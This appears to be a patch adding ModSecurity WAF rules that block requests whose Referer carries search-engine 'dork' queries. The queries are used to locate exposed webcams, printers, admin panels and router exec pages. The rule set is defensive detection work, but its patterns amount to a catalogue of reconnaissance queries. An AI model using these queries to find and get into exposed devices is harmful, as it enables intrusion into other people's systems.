+SecRule REQUEST_HEADERS:Referer   "inurl:webalizer filetype:png -\.gov -\.edu -\.mil -opendarwin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371923,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:status\.cgi\?host=all -cvs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371927,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:login\.jsp\.bak" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371928,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:sitescope\.html intitle:sitescope in(?:text|body):refresh -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371940,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:twiki inurl:twikiusers" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371941,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "phorum admin database connection inurl:forum inurl:admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371942,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:testcgi xitami" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371944,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:webutil\.pl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371949,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:statrep\.nsf -gov" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371950,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/cgi-bin/finger\? in real life" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371951,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/cgi-bin/finger\? enter \(account\|host\|user\|username\) " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371952,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:map\.asp\? intitle:whatsup gold" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371954,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(\(inurl:ifgraph page generated at\) or \(this page was built using ifgraph\)\) " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371956,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/catalog\.nsf intitle:catalog" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371957,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "by reimar hoven\. all rights reserved\. disclaimer \| inurl:log/logdb\.dta " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371962,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "looking glass \(inurl:lg/ \| inurl:lookingglass\) " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371965,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:rpsys\.html" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371987,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "welcome to administration general local domains smtp authentication inurl:admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371989,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "set up the administrator user inurl:pivot" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371992,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/nsearch/adminservlet" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371995,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:servlet/webacc" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371996,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:newsdesk\.cgi\? inurl:t=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371999,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(inurl:/shop\.cgi/page=\) \| \(inurl:/shop\.pl/page=\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:aol\*/_do/rss_popup\?blogid=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372001,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "natterchat inurl:home\.asp -site:natterchat\.co\.uk " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372002,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cgi inurl:fileman\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cgi inurl:web_store\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372010,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:pls/admin_/gateway\.htm " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372016,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/\?pagename=administratorlogin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371678,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:manyservers\.htm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372027,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:oscommerce inurl:admin in(?:text|body):redistributable under the gnuin(?:text|body):online catalog -demo -site:oscommerce\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372028,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:shop hassan consulting's shopping cart version 1\.18" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372031,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/level/15/exec/-" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372032,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/exec/show/tech-support/cr" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372033,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/level/15/exec/-/configure/http" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372034,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:”evocam” inurl:”webcam\.html”" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372036,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:top vantage service gateway -inurl:zyxel" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372037,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:wrcontrollite" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372043,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:live view / - axis \| inurl:view/view\.shtml or inurl:view/indexframe\.shtml \| intitle:mjpg live demo \| in(?:text|body):select preset position" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372048,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cgi-bin/guestimage\.html" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372055,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(intitle:\(eyespyfx\|opticamfx\) go to camera\)\|\(inurl:servlet/detectbrowser\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372056,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(intitle:mobotix intitle:pdas\) \| \(intitle:mobotix intitle:seiten\) \| \(inurl:/pda/index\.html \+camera\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372060,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ok logout inurl:vb\.htm\?logout=1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372063,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:nas inurl:indexeng\.html" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372068,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:setdo\.cgi in(?:text|body):set do ok" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372073,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:::::: intellinet ip camera homepage ::::: or inurl:/main_activex\.asp or inurl:/main_applet\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372075,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "dcs inurl:/web/login\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372077,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:axis inurl:/admin/admin\.shtml" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372078,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/img/vr\.htm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372079,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:sony snt-v304 video network station inurl:hsrindex\.shtml" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372082,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(port_255/home\)\|\(inurl:home\?port=255\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372089,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:webdvr -inurl:product -inurl:demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372104,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:java applet page inurl:ml " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372105,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "tilt intitle:live view / - axis \| inurl:view/view\.shtml" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372109,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:configuration inurl:port_0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372115,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cgistart\?page=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372116,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:s=320x240 \| inurl:s=160x120 inurl:q=mobile" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372117,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:dell \* inurl:port_0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372122,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:start\.htm\?scrw=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372124,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):powered by: adobe printgear inurl:admin " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372126,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:port_255 -htm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372129,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:jpglogin\.htm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372136,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/en/help\.cgi id=\*" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372139,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:lexmark \* inurl:port_0" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372140,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:camctrl\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372152,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:na_admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372160,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:8003/display\?what=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372163,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:index\.htm\?cus\?audio" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372164,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:network print server filetype:shtm \( inurl:u_printjobs \| inurl:u_server \| inurl:a_server \| inurl:u_generalhelp \| u_printjobs \)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372167,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:next_file=main_fs\.htm inurl:img inurl:image\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372170,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:spam firewall inurl:8000/cgi-bin/index\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372174,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "axis storpoint file view inurl:/volumes/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372180,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ipp/pdisplay\.htm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372184,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:smoothwall express inurl:cgi-bin up \* days" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372186,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:evocam inurl:webcam\.html" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372188,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:axis-cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372190,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:level/15/exec/-/show" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372198,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:tivoconnect\?command=queryserver" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372201,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:netw_tcp\.shtml" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372202,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(inurl:webarch/mainframe\.cgi \) \| \(intitle:web image monitor -htm -solutions\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372203,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:my webcamxp server! inurl::8080" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372204,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "camera linksys inurl:main\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372205,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:webeye inurl:login\.ml " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372209,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:hp/device/this\.lcdispatcher " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372210,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:sts_index\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372214,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:network administration inurl:nic" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372215,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(fiery webtools inurl:index2\.html\) \| webtools enable \* \* observe" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372216,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:live view / - axis \| inurl:view/view\.shtml\^" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372218,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "in(?:text|body):centreware inurl:status" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372220,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:liveapplet inurl:lvappl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372221,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
